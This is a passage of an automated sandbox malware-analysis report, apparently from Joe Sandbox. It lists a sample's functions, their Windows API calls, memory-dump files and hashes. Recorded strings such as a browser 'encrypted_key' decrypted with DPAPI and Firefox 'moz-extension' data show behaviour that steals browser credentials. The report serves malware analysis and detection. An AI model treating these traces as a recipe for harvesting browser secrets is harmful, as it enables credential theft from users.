                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3731072634-738592651
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 366a163a151f044c146f585620a6a78dacdef10aba718b65072facacc5e4c977
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 366a163a151f044c146f585620a6a78dacdef10aba718b65072facacc5e4c977
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                                                                                                                                                                                                                                                                                                                  Function 6C5EC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C5EC947
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C5EC969
                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C5EC9A9
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C5EC9C8
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C5EC9E2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a4dab7ff4e5f5aa68f40de9865ddaeabcfbf2b7b2ad86abef25919f996d7b417
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ac4658877bd9bbdbef10ef15c8a14d4ce1a995b046e704cd4f5b36d3604434e8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4dab7ff4e5f5aa68f40de9865ddaeabcfbf2b7b2ad86abef25919f996d7b417
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB21FC727412186BDB04EF25DCC4BAE77B9AB8A744FA00519F903E7740EB70BC0487A9
                                                                                                                                                                                                                                                                                                                                  Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,007998E8,00000000,00020119,?), ref: 00417FEE
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,007A0C50,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00418022
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                                                                                                                                                                                                                                                                                                                  Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                                                                                                                                                                                                                                                                                                                  Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 257331557-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2312457701ad709a26078c142e2e2ed71bf3d5d629f2d997a9efd3b750c7ca97
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2312457701ad709a26078c142e2e2ed71bf3d5d629f2d997a9efd3b750c7ca97
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                                                                                                                                                                                                                                                                                                                  Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 28e76008354bf738b6d6a0d325a77af374a71fa144e748d0a9d3617b0c8fe8ac
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28e76008354bf738b6d6a0d325a77af374a71fa144e748d0a9d3617b0c8fe8ac
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                                                                                                                                                                                                                                                                                                                  Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                                                  • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: daadb3a05c26c27b506c892dd340fe818423b49e711854594888769fa0e65791
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daadb3a05c26c27b506c892dd340fe818423b49e711854594888769fa0e65791
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                                                                                                                                                                                                                                                                                                                  Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0079D738,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416D99
